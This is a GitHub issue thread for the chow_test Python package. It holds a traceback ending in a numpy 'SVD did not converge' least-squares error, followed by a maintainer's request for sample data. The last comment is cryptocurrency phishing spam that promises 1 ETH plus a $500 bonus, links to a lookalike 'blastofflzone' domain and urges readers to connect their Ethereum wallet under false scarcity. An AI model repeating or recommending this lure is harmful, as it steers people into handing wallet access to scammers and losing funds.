### ISSUE TITLE
Bug

### ISSUE THREAD

**Issue by csselo** [jtloong/chow_test#3]
Traceback (most recent call last):
  File "jtest.py", line 751, in <module>
    day_trade(config.mode, start_date, end_date, tend_date, ttime, myporset)
  File "jtest.py", line 663, in day_trade
    test(ts, start_date, end_date, tend_date, por, mode)
  File "jtest.py", line 200, in test
    chowarr = chow(lastnarr, len(lastnarr2))
  File "jtest.py", line 398, in chow
    p = chow_test.p_value(y1, x1, y2, x2)
  File "C:\Users\Dr.Tekgeçer\AppData\Local\Programs\Python\Python36\lib\site-packages\chow_test\_init_.py", line 41, in p_value
    F = f_value(y1, x1, y2, x2, **kwargs)
  File "C:\Users\Dr.Tekgeçer\AppData\Local\Programs\Python\Python36\lib\site-packages\chow_test\_init_.py", line 31, in f_value
    rss_total, n_total = find_rss(np.append(y1, y2), np.append(x1, x2))
  File "C:\Users\Dr.Tekgeçer\AppData\Local\Programs\Python\Python36\lib\site-packages\chow_test\_init_.py", line 26, in find_rss
    rss = np.linalg.lstsq(A, y, rcond=None)[1]
  File "<_array_function_ internals>", line 6, in lstsq
  File "C:\Users\Dr.Tekgeçer\AppData\Local\Programs\Python\Python36\lib\site-packages\numpy\linalg\linalg.py", line 2259, in lstsq
    x, resids, rank, s = gufunc(a, b, rcond, signature=signature, extobj=extobj)
  File "C:\Users\Dr.Tekgeçer\AppData\Local\Programs\Python\Python36\lib\site-packages\numpy\linalg\linalg.py", line 109, in _raise_linalgerror_lstsq
    raise LinAlgError("SVD did not converge in Linear Least Squares")
numpy.linalg.LinAlgError: SVD did not converge in Linear Least Squares

**Comment by jtloong** [comment]
Do you have any sample data/code to replicate this problem?

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
